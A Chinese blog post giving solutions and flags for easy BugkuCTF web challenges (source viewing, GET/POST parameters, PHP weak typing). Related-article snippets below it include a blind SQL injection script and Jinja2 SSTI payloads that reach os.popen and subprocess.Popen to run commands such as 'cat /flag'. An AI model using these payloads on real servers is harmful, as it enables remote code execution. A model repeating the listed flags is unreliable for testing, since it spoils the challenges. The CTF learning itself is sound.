关于BugkuCTF中web题目的总结

最新推荐文章于 2024-12-08 17:47:11 发布
最新推荐文章于 2024-12-08 17:47:11 发布
阅读量1.3k 收藏 5
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 题目总结 文章标签: bugkuCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44149478/article/details/87899320
本文详细总结了BugkuCTF中多个Web题目的解题思路,涉及查看源码、利用GET/POST参数、PHP全局变量、域名解析、Burp Suite抓包工具的使用,以及对Java脚本和X-Forwarded-For头的理解和应用,通过实例展示了解题过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web2

很简单的一道题,进去直接f12查看源码,发现flag。
flag KEY{Web-2-bugKssNNikls9100}

计算器

进去发现是一个计算题,算出答案后输入,发现只能输入一位,查看源码,发现有一条“maxlength=1”,将1改为2或直接删掉,输入计算题答案,得到flag。
flag{CTF-bugku-0032}

web基础$_GET

f12,发现源码是一个条件输出的代码,只有GET获取的what值等于flag是才给flag,于是在url后加上“?what=flag”,得到flag。
flag{bugku_get_su8kej2en}

web基础$_POST

f12查看源码,发现只有POST值等于flag才可以拿到flag。使用火狐浏览器的Hackbar插件post一个值:what=flag,拿到flag
flagflag{bugku_get_ssseint67se}

矛盾

f12,发现就像题目说的真的矛盾,又要num不是数字,又要num等于1。
由于php是一种弱类型语言,判断字符串以1开头即可判断等值,构造url:123.206.87.240:8002/get/index1.php?num=1ab,(ab表示拼接字符串)即可获取flag。
flag{bugku-789-ps-ssdf}

web3

进去是一个窗口,点击了几次发现一直重复,查看源码,发现一个unicode编码“KEY{J2sa42ahJK-HS11III}”,放到浏览器索引框里,得到flag。
KEY{J2sa42ahJK-HS11III}

最低0.47元/天 解锁文章

200万优质内容无限畅学
bugku web 系列题目思路总结(五)
yukinorong的博客
08-09 533
bugku insert into 注入 PHP explode() 将字符串打散为数组。根据第一个参数分割。 一个基于时间的盲注代码。 # -*- coding:utf-8 -*- import requests import sys # 基于时间的盲注,过滤了逗号 , sql = "127.0.0.1'+(select case when substr((select flag from fl...
bugku web知识点总结(1-12)
yifujiadeng的博客
04-16 354
bugku web总结(1-12) web1: ctrl+u,查看页面源码,直接能看到flag,没啥好说的 web2: 让你做三位的算数,但是答案只让你填一位,好在是前端验证,我们可以直接改,f12打开控制台,源码里有个maxlength变量,初始值设了个1,我们改成3,就可以正常输入了,输入正确答案,flag就有了 web3: 打开之后,给了一串源码 $what=$_GET['what']; //接受post过来的参数what,存到what里 echo $what; //打印 if($wha
bugku web总结
h0ryit的博客
06-12 1719
陆陆续续将bugku的web刷了一大半,剩下的都是分比较高的难点的,做过程中遇到了很多的问,大部分就没离开过write up,不过还是学到了很多,因此想做一个总结。 线索收集 拿到一个ctf的第一步就是收集信息,特别是一些隐藏的提示信息,否则会寸步难行。 常见的信息点 网页文档的DOM信息 网页注释 有些会在网页注释中给出提示信息,比如给出一部分源码之类的...
BugKu CTF Web
qq_51110485的博客
06-28 2579
BugKu CTF Web滑稽计算器GETPOSTSimple_SSTI_1矛盾Simple_SSTI_2 滑稽 启动场景,打开链接,页面是一堆滑稽图片,查看网页源代码,flag在注释里面,去掉注释,提交即可。 计算器 打开链接,发现左边是一个加法运算,得到结果是119,但是输入框内只能输入1位数字,fn+f12(win10)打开审查代码,将输入框的maxlength改为3,输入结果,弹出flag。 GET 打开链接,访问页面,发现是一个简单赋值判断,意思是提交get类型 what=flag 会输出fl
BugkuCTF练习记录(一)WEB
小白成长记录
09-16 1040
WEB2 F12 控制台  找到flag 计算器 输入结果发现只能输入一位  F12找到 input属性 修改maxlength的值 WEB 基础$_GET 查看代码 URL中输入?what=flag  WEB 基础$_POST 查看代码 用Firefox 的 hackbar 插件 post what=flag  矛盾 函数 is_numeric() 检测变量是否为数字或...
BugkuCTF Web
2201_75891821的博客
07-30 2101
Bug ku CTF web
CTF|BugkuCTF-WEB思路
这里是一处长期不更新的博客
06-15 2223
截止至练习【login4】,仅提供解思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
【CTF WEB基础】POST-Bugku CTF解及知识点
yu_fly_fish的博客
08-03 700
一起变强!
BugkuCTF-WEB速度要快
am_03的博客
08-28 886
打开网页,只看到一句话:我感觉你得快点!!! F12查看源代码 发现了提示:OK ,now you have to post the margin what you find 需要以POST方式传参,先用BrupSuite抓包看一下 1、使用BrupSuite抓包并重新发送 发送后看到flag 2、使用base64解码 跑的还不错,给你flag吧: MTMyOTIx 3、继续进行一次base64解码 4、通过post方法上传margin=132921 还要再快点,看来有时间限制,不过已经有了思路
BugkuCTF web
weixin_45689999的博客
01-19 919
1.web2 先打开F12看看,很容易发现在注释里面有flag。 把flag后面内容输入即可。 2.计算器 发现是一道及其简单的计算(要是手上没有计算器有些比较难算的话,可以点击题目换一道蛤,但是怎么换答案都是两位数以上的),输入答案,发现只能输入一位数,打开F12 发现他可输入字符长度为1,双击修改成10等位数,再输入正确答案,flag就出现了。 3.web基础-GET变量参考以下网址了解_...
攻防世界39-bug-CTFWeb
LH1013886337的博客
12-08 895
Manage要管理员权限,这的关键那应该就在获取权限上,在外面的找回密码。打算先上传,然后改后缀试试,显示it is not a image。试了download,wirte,read,upload是有效的。dirsearch扫描无果,用sql注入测试失败,注册登录。发现分为两步,第一步提交信息,第二部修改密码。还是不太行,改后缀试试,最后不行再制作图片马。都不行,那可能是conten-type的问。burp抓包看看,拿刚注册的账号密码试试。又不一样了,后缀是php5。不一样了,后缀是php5。
bugkuctf——web(持续更新中)
qq_43705330的博客
04-11 350
1、计算器 先把算出来的值填进去,发现无法填进去,然后看看原码吧 把maxlength改为3即可,得到flag:flag{CTF-bugku-0032} 2、web基础_$GET 查看源码,发现什么都没有,在好好看看题目所给的代码 分析这段代码,意思就是用GET方式获得变量what的值,当what的值为flag时,就打印出flag{}; 因为$_GET传参时请求的参数是在url中的,所以我们...
BugkuCTF_Web——“web基础$_POST”、“计算器”、“矛盾”、“web3”、“你必须让他停下”
Ho1aAs‘s Blog
07-03 945
–>BugCTF传送门<– 文章目录一、“web基础$_POST”二、“计算器”三、“矛盾”四、“web3”五、“你必须让他停下”完 一、“web基础$_POST” –>“web基础$_POST”传送门<– 思路:POST得到flag 解决:使用浏览器插件Hackbar完成POST,得到flag{bugku_get_ssseint67se} 图片演示使用Edge浏览器和Microsoft商城下载的Hackbar插件 二、“计算器” –>“计算器”传送门<– &.
BugkuCTF练习解——Web
qq_41739275的博客
08-24 7065
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
Bugku CTF Web(17-20) Writeup
KRDecad3的博客
06-03 1067
Bugku CTF Web(17-) Writeup 0x17flag在index里 打开页面有一个链接,点击链接发现URL改变, 则可能会有文件包含漏洞。 利用php://filter伪协议,php://filter简单理解为用在对文件的读写操作上。 payload: ?file=php://filter/read=convert.base64-encode/resour...
bugctf中web方向题目记录
wanan的博客
10-06 1140
bugctf中web方向题目记录
Bugku CTF web 你必须让他停下来 解思路
m0_73734159的博客
10-13 1217
Bugku CTF web 你必须让他停下来 解思路
[BugkuCTF] Web --$_POST
小白鸽
09-08 332
靶场 :http://123.206.87.240:8002/post/ 这里需要借助一个工具:post 在线测试 http://coolaf.com/ 1.看 ,这是一个POST传参 这里的意思是传一个GET变量 what=flag , flag就会显示出来 2.这里需要借助一个工具:post 在线测试 http://coolaf.com/ ...
BugkuCTF平台-Web题目笔记
qq_28865787的博客
03-11 721
先从简单的下手,慢慢学习,不断更新~ Web2 查看页面源码,就找到了,嗯,真的好简单。 计算器 还是先查看源码。 &amp;amp;amp;amp;amp;amp;lt;input class=&amp;amp;amp;amp;amp;quot;input&amp;amp;amp;amp;amp;quot; type=&amp;amp;amp;amp;amp;quot;text&amp;amp;amp;amp;amp;quot; maxlength=&am
bugku web Simple_SSTI_2
最新发布
03-27
<think>嗯,用户需要关于Bugku平台上Web题目Simple_SSTI_2的解决方案或详细信息。首先,我得回忆一下SSTI(服务器端模板注入)的基本概念。SSTI通常发生在使用模板引擎渲染用户输入时,如果未正确过滤输入,攻击者可以注入恶意代码。常见的模板引擎有Jinja2(Python)、Twig(PHP)、FreeMarker(Java)等。 题目是Simple_SSTI_2,可能比第一稍难。可能需要绕过一些过滤器或黑名单。比如,某些关键字如"class"、"subclasses"可能被过滤,或者某些特殊字符被转义。用户可能需要找到替代的方法来访问对象的方法或属性。 首先,确定使用的模板引擎类型。例如,Bugku的题目可能基于Python的Flask框架,使用Jinja2模板。在Jinja2中,常用的Payload比如{{config}}或者通过对象继承链来执行命令。比如,通过访问''.__class__.__mro__[1].__subclasses__()来获取子类,寻找可利用的类如subprocess.Popen。 但是题目可能有过滤,比如过滤了下划线或某些关键字。这时候需要绕过,比如使用request.args或request.values来传递参数,或者使用字符串拼接、十六进制编码等方式。例如,将__class__拆分为'_'+'_class'+'_'+'_',或者使用其他属性访问方式如attr()方法。 另外,可能需要绕过对特定函数的限制,比如os模块被禁用,可以考虑使用其他模块如subprocess来执行命令。或者利用内置函数如__import__来动态导入模块。 假设题目中存在黑名单过滤了"class"、"subclasses"等关键字,那么可能需要寻找替代方法。例如,使用原生Python的魔术方法或属性,或者使用过滤器如|attr()来拼接字符串。例如,{{''|attr('__class__')}}来获取类对象。 另外,如果题目中存在对某些字符的过滤,比如双下划线被过滤,可以使用request对象中的参数来传递。例如,构造Payload为{{''[request.args.a][request.args.b][request.args.c]()}},然后通过URL参数传递a=__class__,b=__base__等。 还需要考虑如何执行系统命令。例如,找到subprocess.Popen类,然后调用它执行命令。可能需要遍历子类来找到可用的类。例如,在Jinja2中,可以通过{{''.__class__.__mro__[1].__subclasses__()}}来获取所有子类,然后找到索引对应的Popen类。 如果题目中有沙箱环境,可能需要更复杂的绕过方式,比如利用Python的内省机制或全局变量。例如,使用__globals__或__builtins__来访问需要的函数。 总结步骤可能为:确定模板引擎类型→探测过滤规则→构造Payload绕过过滤→访问对象继承链→找到可利用的类→执行命令获取flag。 可能需要参考类似题目的解法,比如通过{{config}}查看配置信息,或者通过{{''.__class__.__base__.__subclasses__()[X].__init__.__globals__}}来访问模块的全局变量,进而导入os模块执行命令。 最后,验证Payload的有效性,并确保在题目环境中正确执行。可能需要多次尝试不同的索引或方法,直到找到正确的子类索引。</think>### Bugku Web题目 Simple_SSTI_2 解决方案 #### 1. 漏洞背景 Simple_SSTI_2考察**服务器端模板注入(SSTI)**漏洞,常见于未严格过滤用户输入的模板引擎(如Jinja2)。攻击者通过注入恶意代码可执行任意命令或读取敏感数据[^1]。 #### 2. 基本分析步骤 1. **确定模板引擎类型** 输入`{{7*7}}`,若返回`49`则为Jinja2/Twig类引擎;若返回`7777777`则可能为其他引擎(如Mako)。 2. **探测过滤规则** 尝试基础Payload如`{{''.__class__}}`,若返回错误或空白,说明可能过滤了关键字(如`_`、`class`)。 例如题目可能过滤下划线,需改用其他方式(如`request.args`传参或字符串拼接)。 #### 3. 绕过过滤的Payload示例 假设题目过滤了`_`和`class`,可通过以下方式绕过: ```python {{ ''|attr(request.args.a) }}&a=__class__ ``` 或使用十六进制编码: ```python {{ ""|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f") }} ``` #### 4. 利用对象继承链执行命令 1. **获取基类** ```python {{ ''.__class__.__mro__[1] }} # 输出:<class 'object'> ``` 2. **遍历子类寻找可利用类** ```python {{ ''.__class__.__mro__[1].__subclasses__()[400] }} # 假设索引400为subprocess.Popen ``` 3. **执行系统命令** ```python {{ ''.__class__.__mro__[1].__subclasses__()[400]('ls', shell=True, stdout=-1).communicate() }} ``` #### 5. 获取Flag的典型Payload 若题目限制严格,可通过`__globals__`访问内置模块: ```python {{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }} ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值